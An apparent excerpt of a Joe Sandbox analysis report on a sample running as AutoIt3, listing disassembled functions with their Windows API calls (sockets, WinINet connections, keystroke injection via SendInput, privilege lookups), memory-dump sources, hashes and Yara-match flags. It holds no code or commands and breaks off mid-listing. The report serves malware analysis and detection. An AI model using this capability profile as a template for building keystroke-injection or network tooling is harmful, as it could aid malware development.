                                      Function 00877095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 008770BC
                                      • WSAGetLastError.WSOCK32(00000000), ref: 008770CC
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00877130
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0087713C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLast$__itow__swprintfsocket
                                      • String ID:
                                      • API String ID: 2214342067-0
                                      • Opcode ID: d71d33bfd36ef8ff1eea42500aafaa0763f65c0ca375106be520becc15f78369
                                      • Instruction ID: d1f6f4cd305126d999b5dc28a9ac11491ff605408e6df8e1e8e4d41344423e0a
                                      • Opcode Fuzzy Hash: d71d33bfd36ef8ff1eea42500aafaa0763f65c0ca375106be520becc15f78369
                                      • Instruction Fuzzy Hash: AB4161B5780200AFE760AF68DC87F6A77A4FB04B14F548458FA59DB3D2DA719D008B92
                                      Function 00876B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00890980), ref: 00876B92
                                      • _strlen.LIBCMT ref: 00876BC4
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID:
                                      • API String ID: 4218353326-0
                                      • Opcode ID: 1bdb299fed25a785b0e42fea3ac2bab006677ec9301df82d5b694257229901f0
                                      • Instruction ID: 227fd996e8830af8dcb2fc69cc3b112c22803c70e3df0b1d5f9e98e5d27c344d
                                      • Opcode Fuzzy Hash: 1bdb299fed25a785b0e42fea3ac2bab006677ec9301df82d5b694257229901f0
                                      • Instruction Fuzzy Hash: 3841DF71600508AFCB04FBA8DC95EAEB7A9FF54310F148155F91ADB292EB30ED51CB92
                                      Function 03CCF3B4 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 03CCF463
                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 03CCF47F
                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 03CCF4F6
                                      • VariantClear.OLEAUT32(?), ref: 03CCF51F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                      • String ID:
                                      • API String ID: 920484758-0
                                      • Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                      • Instruction ID: 29d1934b5f8fd58483e8b8a20b4942f69aaf97398230e32f220c1200efa851ab
                                      • Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
                                      • Instruction Fuzzy Hash: 60411979A103599FCB61DB58CC90BC9B3BDAF49200F0541EDE649EB211DA30AF819F60
                                      Function 0086BE37 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0086BEE1
                                      • GetLastError.KERNEL32(?,00000000), ref: 0086BF07
                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0086BF2C
                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0086BF58
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                      • String ID:
                                      • API String ID: 3321077145-0
                                      • Opcode ID: eab70b46c01b8f79df33d8c599ae0986a36dc92df53abf50f015d91a90d98be8
                                      • Instruction ID: 9be0145aacf8c4b85c8b6b98e44ca569a97561b4827af6ee2793c587f9dae5ae
                                      • Opcode Fuzzy Hash: eab70b46c01b8f79df33d8c599ae0986a36dc92df53abf50f015d91a90d98be8
                                      • Instruction Fuzzy Hash: 58410775600A10DFCB11EF59C885A59BBE1FF49314B198498ED49DB3A2CB31FD42CB92
                                      Function 00888E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                      Download Yara Rule
                                      APIs
                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00888F03
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InvalidateRect
                                      • String ID:
                                      • API String ID: 634782764-0
                                      • Opcode ID: a94fb1b37961b7ee11486e93e25e642c0b028fa3eb010f9e81a632d974bdc92a
                                      • Instruction ID: 4d87d39b07410e5c9c4229a3b1090c8f95d93771f71037426721cf673385fe4d
                                      • Opcode Fuzzy Hash: a94fb1b37961b7ee11486e93e25e642c0b028fa3eb010f9e81a632d974bdc92a
                                      • Instruction Fuzzy Hash: DB319C34604209EEEB30BA58CC49FA837A6FB09324F944512FB51E62A1DF71ED50DB51
                                      Function 0088B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ClientToScreen.USER32(01183D90,?), ref: 0088B1D2
                                      • GetWindowRect.USER32(?,?), ref: 0088B248
                                      • PtInRect.USER32(?,?,0088C6BC), ref: 0088B258
                                      • MessageBeep.USER32(00000000), ref: 0088B2C9
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: c4b0ab6a7a358149c2bee520b597fae0cb40ba65dee8df5313e4c86aec3e4b16
                                      • Instruction ID: 2d606ba18d8df9d9e4478baa2cbc91052f71fdb6629349bf40d7d14b4f079d8e
                                      • Opcode Fuzzy Hash: c4b0ab6a7a358149c2bee520b597fae0cb40ba65dee8df5313e4c86aec3e4b16
                                      • Instruction Fuzzy Hash: 91415D30A04219DFDB21EF98C884EAD7BF5FF89315F1885A9E928DB265D730A941CF50
                                      Function 008612D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00861326
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00861342
                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 008613A8
                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 008613FA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 3a813fc4578b962fa3a7db6b82a82f37d80c1146a3b61f4cccc79a75c5071665
                                      • Instruction ID: 04a6243c4ee9f7fd259c216ba9aaf1db43d82ce41990108cdbbbe75d00649006
                                      • Opcode Fuzzy Hash: 3a813fc4578b962fa3a7db6b82a82f37d80c1146a3b61f4cccc79a75c5071665
                                      • Instruction Fuzzy Hash: A6313930A40218AEFF308A658D0DBFE7BBAFB44310F0D421AE592D27D2D37889419B95
                                      Function 00861410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00861465
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00861481
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 008614E0
                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00861532
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 1de56cfd99ff6eba9e302f9e224a07a253fbd90a083752dc7db339ab4b8a2f44
                                      • Instruction ID: 9dffecb4cd84661cb0d5177c1de480fc9d94620df4006ceee2ae7f490cae9de2
                                      • Opcode Fuzzy Hash: 1de56cfd99ff6eba9e302f9e224a07a253fbd90a083752dc7db339ab4b8a2f44
                                      • Instruction Fuzzy Hash: D2314830A402185EFF348A659C0CBFABBA6FB85315F0D435AE481D31D2CB748941DB6A
                                      Function 008363F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0083642B
                                      • __isleadbyte_l.LIBCMT ref: 00836459
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00836487
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 008364BD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 84a7db6fe70789e7e3c768fac59b2d364af77cfc691d84055f9911de15da833b
                                      • Instruction ID: 13c7746add44f263d855401686a2abc69bfcb828b9486f3b7a1811d874e266ee
                                      • Opcode Fuzzy Hash: 84a7db6fe70789e7e3c768fac59b2d364af77cfc691d84055f9911de15da833b
                                      • Instruction Fuzzy Hash: 3831B031A00256BFDB218F69CC45BAA7BA5FF81320F158469E864D7191EB31E8A0DB94
                                      Function 0088552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 0088553F
                                        • Part of subcall function 00863B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00863B4E
                                        • Part of subcall function 00863B34: GetCurrentThreadId.KERNEL32 ref: 00863B55
                                        • Part of subcall function 00863B34: AttachThreadInput.USER32(00000000,?,008655C0), ref: 00863B5C
                                      • GetCaretPos.USER32(?), ref: 00885550
                                      • ClientToScreen.USER32(00000000,?), ref: 0088558B
                                      • GetForegroundWindow.USER32 ref: 00885591
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      • Opcode ID: 3fc9e33bdca13035bb7b2d67f32f620ef90ff4ad0f31123242399bc285142f91
                                      • Instruction ID: 053f2234051b42a081a239d6b0e11c54dfeaaeb61ba1e00cb169f6670cfb6e8d
                                      • Opcode Fuzzy Hash: 3fc9e33bdca13035bb7b2d67f32f620ef90ff4ad0f31123242399bc285142f91
                                      • Instruction Fuzzy Hash: 51312FB1900108AFDB40EFA9DC85DEFB7F9FF94304F11406AE915E7241EA71AE448BA1
                                      Function 0088CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008029E2: GetWindowLongW.USER32(?,000000EB), ref: 008029F3
                                      • GetCursorPos.USER32(?), ref: 0088CB7A
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0083BCEC,?,?,?,?,?), ref: 0088CB8F
                                      • GetCursorPos.USER32(?), ref: 0088CBDC
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0083BCEC,?,?,?), ref: 0088CC16
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      • Opcode ID: acc56338a7093fb8a04ddbd0265f4a8f31e105a4abad50765548534bbf466721
                                      • Instruction ID: 3a8c3e93f79db2439ecff3640346aa5ab2e4690bd1c382fea0d4ef57d544e122
                                      • Opcode Fuzzy Hash: acc56338a7093fb8a04ddbd0265f4a8f31e105a4abad50765548534bbf466721
                                      • Instruction Fuzzy Hash: 44319E35600418AFCB25AF59CC59EBA7BB9FF49320F0440A9F945DB261C7319D50EFA0
                                      Function 00820BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                      • __setmode.LIBCMT ref: 00820BE2
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867E51,?,?,00000000), ref: 00814041
                                        • Part of subcall function 0081402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867E51,?,?,00000000,?,?), ref: 00814065
                                      • _fprintf.LIBCMT ref: 00820C19
                                      • OutputDebugStringW.KERNEL32(?), ref: 0085694C
                                        • Part of subcall function 00824CCA: _flsall.LIBCMT ref: 00824CE3
                                      • __setmode.LIBCMT ref: 00820C4E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                      • String ID:
                                      • API String ID: 521402451-0
                                      • Opcode ID: 526c28fda19deba827b4497f0daac6ec7cb9c86fce800622dfabce2baa8d3c6b
                                      • Instruction ID: 2611300bc5736528fba76d0c0e1757070459f954a5bd915e95726e06509453ba
                                      • Opcode Fuzzy Hash: 526c28fda19deba827b4497f0daac6ec7cb9c86fce800622dfabce2baa8d3c6b
                                      • Instruction Fuzzy Hash: 2B1105B19041286EDB08B7ACBC429BE7B6DFF40321F141156F604D71C2DE2119D64BA2
                                      Function 00859274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00858D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00858D3F
                                        • Part of subcall function 00858D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00858D49
                                        • Part of subcall function 00858D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D58
                                        • Part of subcall function 00858D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D5F
                                        • Part of subcall function 00858D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00858D75
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008592C1
                                      • _memcmp.LIBCMT ref: 008592E4
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0085931A
                                      • HeapFree.KERNEL32(00000000), ref: 00859321
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      • Opcode ID: 31e35b7acc25905d94ec1ad753cd9174d1727d49536c5c26ab60009c21d3e975
                                      • Instruction ID: 21e1c8bcf1217d3e622f846308278d10d7bb03fbac3e8f7f6e93d425f8c26c91
                                      • Opcode Fuzzy Hash: 31e35b7acc25905d94ec1ad753cd9174d1727d49536c5c26ab60009c21d3e975
                                      • Instruction Fuzzy Hash: 0F219D72E40108EFDB10DFA4C945BEEB7B8FF54342F184059E895E7291E770AA09DB90
                                      Function 00871E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00871E6F
                                        • Part of subcall function 00871EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00871F18
                                        • Part of subcall function 00871EF9: InternetCloseHandle.WININET(00000000), ref: 00871FB5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      • Opcode ID: 3d21e6899aa056ec4d07563dadabb196875e91de9fec66806c3ca4272d0c6183
                                      • Instruction ID: f5a20a5d56d8309f9672d89fee77589429f3153cb08f3a234cd03c0b77945f9b
                                      • Opcode Fuzzy Hash: 3d21e6899aa056ec4d07563dadabb196875e91de9fec66806c3ca4272d0c6183
                                      • Instruction Fuzzy Hash: 87219232204605BFDB119F688C05F7BB7AEFF84710F14811AFE49D6954DB71E8119B90
                                      Function 00863F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,00892C4C), ref: 00863F57
                                      • GetLastError.KERNEL32 ref: 00863F66
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00863F75
                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00892C4C), ref: 00863FD2
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                      • String ID:
                                      • API String ID: 2267087916-0
                                      • Opcode ID: 1b4aee7e77cc4f979aa360b10cf4e39477019ef9ba2662e18c43800abf588571
                                      • Instruction ID: 77dc4a7d5177117a21138c537605f38624c63eb52f39af46b3f872991b2e7bcc
                                      • Opcode Fuzzy Hash: 1b4aee7e77cc4f979aa360b10cf4e39477019ef9ba2662e18c43800abf588571
                                      • Instruction Fuzzy Hash: 392151709082019F8710EF28D8858AEB7F8FF59368F154A1EF4A5C72A1DB31DA46CB52
                                      Function 03D17244 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 03D1727C
                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 03D1729E
                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 03D172A8
                                      • ReleaseDC.USER32(00000000,00000000), ref: 03D172EB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: 7d6857d77cd2be96a4cb7b8c5ec5321ab712cb04d483956c84c88609a6d51820
                                      • Instruction ID: ef1de3697124d61983ff1a0e45a600166a34ddbec2cde6264f88375900bcf4b1
                                      • Opcode Fuzzy Hash: 7d6857d77cd2be96a4cb7b8c5ec5321ab712cb04d483956c84c88609a6d51820
                                      • Instruction Fuzzy Hash: 9121A174B10348BFD701EBA5CC80BAEB7B8EB44700F924468E914FA290DA745E119661
                                      Function 0088634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EC), ref: 008863BD
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008863D7
                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008863E5
